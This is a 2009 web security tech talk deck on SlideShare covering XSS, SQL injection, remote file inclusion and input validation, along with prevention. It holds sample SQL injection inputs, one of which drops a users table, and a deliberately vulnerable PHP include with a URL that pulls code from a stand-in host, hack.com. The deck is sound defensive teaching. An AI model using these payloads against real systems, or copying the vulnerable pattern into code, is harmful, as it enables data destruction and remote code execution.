SlideShare a Scribd company logo
Web Security: Tech Talk Mallik http://codeinspections.blogspot.com March 20 th , 2009
Introduction Web applications are accessible openly on web there by making it more prone to hacking. Web Developers are not well versed with security issues because of which the applications are prone to vulnerabilities. Web applications run in the browser, any security loop hole in browser will lead to exploiting vulnerability in web application.
Where do security bugs hide ? Functional Bugs Security Bugs Design Implementation
Web Vulnerabilities XSS (Cross Site Scripting) Attack [44%] SQL Injection [25%] Input Validation [8%] Remote File Inclusion [17%] Cookie Theft [3%]
XSS (Cross Site Scripting) XSS :  code injection by malicious web users into the web pages. Non Persistent: These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. Ex: Search Engines [exploits using social engineering]  Example Persistent: XSS vulnerability that exists when data provided to a web application by a user is stored persistently on the server  Ex: Blogger Comments Example
XSS (Cross Site Scripting) Exploits Session Hijacking / Cookie Theft [ Example ] Redirecting the page to hacker’s desired location [persistent] [ Example ]
Preventing XSS Escaping/Filtering Some of characters like <,> as we do for Portal Application Replacing characters < with &lt; and > with &gt; Both the above solutions prevent users from entering rich HTML content which is required for many web 2.0 Products Escape HTML tags which can be malicious like <script>, <meta> etc. Blogger, MySpace are some with this kind of implementation.
SQL Injection SQL Injection is a security vulnerability occurring in the DB layer. It is method to inject SQL command/query through the webpage. Hacker can come up with an intelligent input which may cause the application to do what it is not supposed to do.  Examples: Incorrect escaping/Filtering: Query:  statement = &quot;SELECT * FROM users WHERE name = '&quot; +  userName  + &quot;';&quot;  Hacker’s input:  a’ OR ‘x’=x Final Statement = SELECT * FROM users WHERE name = ‘a’ OR ‘x’=x’;
SQL Injection More Serious attack: Query:  statement = &quot;SELECT * FROM users WHERE name = '&quot; + userName + &quot;';&quot;  Hacker’s input:  a’; Drop Table Users; Select * from Users where name like ‘% Final Statement = SELECT * FROM users WHERE name = ‘ a’; Drop Table Users; Select * from Users where name like ‘% ’
Preventing SQL Injection  Escaping Special Characters Error-prone way to prevent injections is to  escape  dangerous characters. - Replacing  ‘  with  ‘’   - In MYSQL, use mysql_real_escape_string() to escape special characters  Using Parameterized Statements myCommand = new SqlCommand(&quot;SELECT * FROM USERS WHERE USERNAME=@username AND PASSWORD= @password&quot;, myConnection)) {  myCommand.Parameters.AddWithValue(&quot;@username&quot;, user); myCommand.Parameters.AddWithValue(&quot;@password&quot;, pass);
Remote File Inclusion RFI vulnerabilities allow hackers to run their code on the web servers. XSS is code injection on client side, whereas RFI is on server side. Bad coding practice where filenames were sent as Query parameters can be used as any normal variable in the code. This was one of common PHP vulnerabilities in early days.
RFI Example <?php $file=$_REQUEST[‘file’]; include ($file.&quot;php&quot;); ?> URL: http://test.com/test.php?file=http://hack.com/hack.php? The code in hack.php would get executed on the server
Input Validation Most of security vulnerabilities are because of Hacky input. Input Validation on Client Side (javascript) alone will not suffice. We need to have check for user input on both Client and Server. Hacker can  disable the checks on client side and send invalid input to Server Side. ( Example ) Example:  Shopping site example about how serious a attack can be if there is no server side check.
Security Vulnerability Via Browser Bugs  Browser bugs can sometimes lead to finding vulnerabilities in the Web Applications Example is Cross-Domain XMLHTTP Vulnerability in First version of Chrome What is Cross-Domain XMLHTTP ? What was bug in Chrome Version 1.0 ?  Example
Lessons to Learn Web Security is not Rocket science Validate Input Validate output Watch for New Security Attacks and how they affect your products
Thank You

More Related Content

What's hot (20)

PPT
Web Application Security
Chris Hillman
 
PPTX
Web application attack Presentation
Khoa Nguyen
 
PPT
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
PPTX
Secure Code Warrior - Trust no input
Secure Code Warrior
 
PDF
State of Web Security RailsConf 2016
IMMUNIO
 
PDF
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
ODP
Top 10 Web Security Vulnerabilities
Carol McDonald
 
PPTX
A7 Missing Function Level Access Control
stevil1224
 
PDF
Testing Web Application Security
Ted Husted
 
PDF
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
 
PDF
What Should Go Into A Web Application Penetration Testing Checklist?
Hacker Combat
 
PPTX
Security testing
Khizra Sammad
 
DOC
Attackers Vs Programmers
robin_bene
 
PDF
Penetration testing web application web application (in) security
Nahidul Kibria
 
PPTX
Owasp top 10 security threats
Vishal Kumar
 
PDF
Web Security 101
Michael Peters
 
PDF
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
bhumika2108
 
PPTX
OWASP top 10-2013
tmd800
 
PPT
Web Hacking
Information Technology
 
PDF
Broken access controls
Akansha Kesharwani
 
Web Application Security
Chris Hillman
 
Web application attack Presentation
Khoa Nguyen
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
Secure Code Warrior - Trust no input
Secure Code Warrior
 
State of Web Security RailsConf 2016
IMMUNIO
 
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
Top 10 Web Security Vulnerabilities
Carol McDonald
 
A7 Missing Function Level Access Control
stevil1224
 
Testing Web Application Security
Ted Husted
 
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
 
What Should Go Into A Web Application Penetration Testing Checklist?
Hacker Combat
 
Security testing
Khizra Sammad
 
Attackers Vs Programmers
robin_bene
 
Penetration testing web application web application (in) security
Nahidul Kibria
 
Owasp top 10 security threats
Vishal Kumar
 
Web Security 101
Michael Peters
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
bhumika2108
 
OWASP top 10-2013
tmd800
 
Broken access controls
Akansha Kesharwani
 

Viewers also liked (20)

PPT
Latvia - Presentation from Veronika
brixi1
 
PPT
Facts About The Tundra Brigger
Michelle McGinnis
 
PPT
Green-White Dialoog ZL 3 Maart
Leo Brand van den
 
PDF
Waddell Slideshowpdf
ambersalmon
 
PPT
Itb Chap 11
Brad McCullough
 
PPT
Prayer
hockdy
 
PDF
Innerwealth Living Inspired Magazine August Issue
Chris Walker
 
PPT
Itb Chap 07
Brad McCullough
 
PPSX
Fortheinternet
guestd48635
 
PPS
Oli1
cardenas_m
 
PPTX
Dimensional Modeling
jamessnape
 
PPTX
Social network_2010
Massimo Baldo
 
PDF
Axfood q2 2010_presentation
Axfood
 
PDF
Mapping of HIV/AIDS Facilities in Maharashtra by Dr. C. A. K. Yesudian
Priyanka_vshukla
 
PDF
Talent Connect Live Stream Behind the Scenes
Rob Humphrey
 
PPTX
Badges, Badgers, Mushrooms, and a Snake
nniiccoollee
 
PDF
Interim report Axfood Q3 2010
Axfood
 
PPT
Test Driven Development
John Blanco
 
PPT
Cold Tundra Project Watts
Michelle McGinnis
 
Latvia - Presentation from Veronika
brixi1
 
Facts About The Tundra Brigger
Michelle McGinnis
 
Green-White Dialoog ZL 3 Maart
Leo Brand van den
 
Waddell Slideshowpdf
ambersalmon
 
Itb Chap 11
Brad McCullough
 
Prayer
hockdy
 
Innerwealth Living Inspired Magazine August Issue
Chris Walker
 
Itb Chap 07
Brad McCullough
 
Fortheinternet
guestd48635
 
Dimensional Modeling
jamessnape
 
Social network_2010
Massimo Baldo
 
Axfood q2 2010_presentation
Axfood
 
Mapping of HIV/AIDS Facilities in Maharashtra by Dr. C. A. K. Yesudian
Priyanka_vshukla
 
Talent Connect Live Stream Behind the Scenes
Rob Humphrey
 
Badges, Badgers, Mushrooms, and a Snake
nniiccoollee
 
Interim report Axfood Q3 2010
Axfood
 
Test Driven Development
John Blanco
 
Cold Tundra Project Watts
Michelle McGinnis
 
Ad

Similar to Security Tech Talk (20)

PPTX
Attacking Web Applications
Sasha Goldshtein
 
PPTX
Vulnerabilities in modern web applications
Niyas Nazar
 
PPTX
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
PPT
Php & Web Security - PHPXperts 2009
mirahman
 
PPTX
Top web apps security vulnerabilities
Aleksandar Bozinovski
 
PPTX
ASP.NET security vulnerabilities
Aleksandar Bozinovski
 
PPTX
Security testing for web developers
matthewhughes
 
PPSX
Web security
kareem zock
 
PPTX
6 - Web Application Security.pptx
AlmaOraevi
 
PDF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Mark Stanton
 
PPT
Defcon9 Presentation2001
Miguel Ibarra
 
PPT
Web Application Security - "In theory and practice"
Jeremiah Grossman
 
PDF
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
PDF
4 andrii kudiurov - web application security 101
Ievgenii Katsan
 
PPT
Application Security
nirola
 
PPT
Web Bugs
Dr Rushi Raval
 
PPT
Unusual Web Bugs
amiable_indian
 
PPSX
Web Security
Supankar Banik
 
PDF
The top 10 security issues in web applications
Devnology
 
PDF
Web Application Security
Ynon Perek
 
Attacking Web Applications
Sasha Goldshtein
 
Vulnerabilities in modern web applications
Niyas Nazar
 
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Php & Web Security - PHPXperts 2009
mirahman
 
Top web apps security vulnerabilities
Aleksandar Bozinovski
 
ASP.NET security vulnerabilities
Aleksandar Bozinovski
 
Security testing for web developers
matthewhughes
 
Web security
kareem zock
 
6 - Web Application Security.pptx
AlmaOraevi
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Mark Stanton
 
Defcon9 Presentation2001
Miguel Ibarra
 
Web Application Security - "In theory and practice"
Jeremiah Grossman
 
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
4 andrii kudiurov - web application security 101
Ievgenii Katsan
 
Application Security
nirola
 
Web Bugs
Dr Rushi Raval
 
Unusual Web Bugs
amiable_indian
 
Web Security
Supankar Banik
 
The top 10 security issues in web applications
Devnology
 
Web Application Security
Ynon Perek
 
Ad

Recently uploaded (20)

PPTX
Basics and rules of probability with real-life uses
ravatkaran694
 
DOCX
Modul Ajar Deep Learning Bahasa Inggris Kelas 11 Terbaru 2025
wahyurestu63
 
PPTX
ENGLISH 8 WEEK 3 Q1 - Analyzing the linguistic, historical, andor biographica...
OliverOllet
 
PPTX
Dakar Framework Education For All- 2000(Act)
santoshmohalik1
 
PPTX
Command Palatte in Odoo 18.1 Spreadsheet - Odoo Slides
Celine George
 
PPTX
K-Circle-Weekly-Quiz12121212-May2025.pptx
Pankaj Rodey
 
PPTX
How to Close Subscription in Odoo 18 - Odoo Slides
Celine George
 
PPTX
PROTIEN ENERGY MALNUTRITION: NURSING MANAGEMENT.pptx
PRADEEP ABOTHU
 
PDF
Antianginal agents, Definition, Classification, MOA.pdf
Prerana Jadhav
 
PDF
BÀI TẬP TEST BỔ TRỢ THEO TỪNG CHỦ ĐỀ CỦA TỪNG UNIT KÈM BÀI TẬP NGHE - TIẾNG A...
Nguyen Thanh Tu Collection
 
PPT
DRUGS USED IN THERAPY OF SHOCK, Shock Therapy, Treatment or management of shock
Rajshri Ghogare
 
PPTX
The Future of Artificial Intelligence Opportunities and Risks Ahead
vaghelajayendra784
 
PPTX
I INCLUDED THIS TOPIC IS INTELLIGENCE DEFINITION, MEANING, INDIVIDUAL DIFFERE...
parmarjuli1412
 
PPTX
Artificial Intelligence in Gastroentrology: Advancements and Future Presprec...
AyanHossain
 
PPTX
Continental Accounting in Odoo 18 - Odoo Slides
Celine George
 
PDF
John Keats introduction and list of his important works
vatsalacpr
 
PDF
Tips for Writing the Research Title with Examples
Thelma Villaflores
 
PPTX
Translation_ Definition, Scope & Historical Development.pptx
DhatriParmar
 
PPTX
Digital Professionalism and Interpersonal Competence
rutvikgediya1
 
PPTX
Electrophysiology_of_Heart. Electrophysiology studies in Cardiovascular syste...
Rajshri Ghogare
 
Basics and rules of probability with real-life uses
ravatkaran694
 
Modul Ajar Deep Learning Bahasa Inggris Kelas 11 Terbaru 2025
wahyurestu63
 
ENGLISH 8 WEEK 3 Q1 - Analyzing the linguistic, historical, andor biographica...
OliverOllet
 
Dakar Framework Education For All- 2000(Act)
santoshmohalik1
 
Command Palatte in Odoo 18.1 Spreadsheet - Odoo Slides
Celine George
 
K-Circle-Weekly-Quiz12121212-May2025.pptx
Pankaj Rodey
 
How to Close Subscription in Odoo 18 - Odoo Slides
Celine George
 
PROTIEN ENERGY MALNUTRITION: NURSING MANAGEMENT.pptx
PRADEEP ABOTHU
 
Antianginal agents, Definition, Classification, MOA.pdf
Prerana Jadhav
 
BÀI TẬP TEST BỔ TRỢ THEO TỪNG CHỦ ĐỀ CỦA TỪNG UNIT KÈM BÀI TẬP NGHE - TIẾNG A...
Nguyen Thanh Tu Collection
 
DRUGS USED IN THERAPY OF SHOCK, Shock Therapy, Treatment or management of shock
Rajshri Ghogare
 
The Future of Artificial Intelligence Opportunities and Risks Ahead
vaghelajayendra784
 
I INCLUDED THIS TOPIC IS INTELLIGENCE DEFINITION, MEANING, INDIVIDUAL DIFFERE...
parmarjuli1412
 
Artificial Intelligence in Gastroentrology: Advancements and Future Presprec...
AyanHossain
 
Continental Accounting in Odoo 18 - Odoo Slides
Celine George
 
John Keats introduction and list of his important works
vatsalacpr
 
Tips for Writing the Research Title with Examples
Thelma Villaflores
 
Translation_ Definition, Scope & Historical Development.pptx
DhatriParmar
 
Digital Professionalism and Interpersonal Competence
rutvikgediya1
 
Electrophysiology_of_Heart. Electrophysiology studies in Cardiovascular syste...
Rajshri Ghogare
 

Security Tech Talk

  • 1. Web Security: Tech Talk Mallik http://codeinspections.blogspot.com March 20 th , 2009
  • 2. Introduction Web applications are accessible openly on web there by making it more prone to hacking. Web Developers are not well versed with security issues because of which the applications are prone to vulnerabilities. Web applications run in the browser, any security loop hole in browser will lead to exploiting vulnerability in web application.
  • 3. Where do security bugs hide ? Functional Bugs Security Bugs Design Implementation
  • 4. Web Vulnerabilities XSS (Cross Site Scripting) Attack [44%] SQL Injection [25%] Input Validation [8%] Remote File Inclusion [17%] Cookie Theft [3%]
  • 5. XSS (Cross Site Scripting) XSS : code injection by malicious web users into the web pages. Non Persistent: These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. Ex: Search Engines [exploits using social engineering] Example Persistent: XSS vulnerability that exists when data provided to a web application by a user is stored persistently on the server Ex: Blogger Comments Example
  • 6. XSS (Cross Site Scripting) Exploits Session Hijacking / Cookie Theft [ Example ] Redirecting the page to hacker’s desired location [persistent] [ Example ]
  • 7. Preventing XSS Escaping/Filtering Some of characters like <,> as we do for Portal Application Replacing characters < with &lt; and > with &gt; Both the above solutions prevent users from entering rich HTML content which is required for many web 2.0 Products Escape HTML tags which can be malicious like <script>, <meta> etc. Blogger, MySpace are some with this kind of implementation.
  • 8. SQL Injection SQL Injection is a security vulnerability occurring in the DB layer. It is method to inject SQL command/query through the webpage. Hacker can come up with an intelligent input which may cause the application to do what it is not supposed to do. Examples: Incorrect escaping/Filtering: Query: statement = &quot;SELECT * FROM users WHERE name = '&quot; + userName + &quot;';&quot; Hacker’s input: a’ OR ‘x’=x Final Statement = SELECT * FROM users WHERE name = ‘a’ OR ‘x’=x’;
  • 9. SQL Injection More Serious attack: Query: statement = &quot;SELECT * FROM users WHERE name = '&quot; + userName + &quot;';&quot; Hacker’s input: a’; Drop Table Users; Select * from Users where name like ‘% Final Statement = SELECT * FROM users WHERE name = ‘ a’; Drop Table Users; Select * from Users where name like ‘% ’
  • 10. Preventing SQL Injection Escaping Special Characters Error-prone way to prevent injections is to escape dangerous characters. - Replacing ‘ with ‘’ - In MYSQL, use mysql_real_escape_string() to escape special characters Using Parameterized Statements myCommand = new SqlCommand(&quot;SELECT * FROM USERS WHERE USERNAME=@username AND PASSWORD= @password&quot;, myConnection)) { myCommand.Parameters.AddWithValue(&quot;@username&quot;, user); myCommand.Parameters.AddWithValue(&quot;@password&quot;, pass);
  • 11. Remote File Inclusion RFI vulnerabilities allow hackers to run their code on the web servers. XSS is code injection on client side, whereas RFI is on server side. Bad coding practice where filenames were sent as Query parameters can be used as any normal variable in the code. This was one of common PHP vulnerabilities in early days.
  • 12. RFI Example <?php $file=$_REQUEST[‘file’]; include ($file.&quot;php&quot;); ?> URL: http://test.com/test.php?file=http://hack.com/hack.php? The code in hack.php would get executed on the server
  • 13. Input Validation Most of security vulnerabilities are because of Hacky input. Input Validation on Client Side (javascript) alone will not suffice. We need to have check for user input on both Client and Server. Hacker can disable the checks on client side and send invalid input to Server Side. ( Example ) Example: Shopping site example about how serious a attack can be if there is no server side check.
  • 14. Security Vulnerability Via Browser Bugs Browser bugs can sometimes lead to finding vulnerabilities in the Web Applications Example is Cross-Domain XMLHTTP Vulnerability in First version of Chrome What is Cross-Domain XMLHTTP ? What was bug in Chrome Version 1.0 ? Example
  • 15. Lessons to Learn Web Security is not Rocket science Validate Input Validate output Watch for New Security Attacks and how they affect your products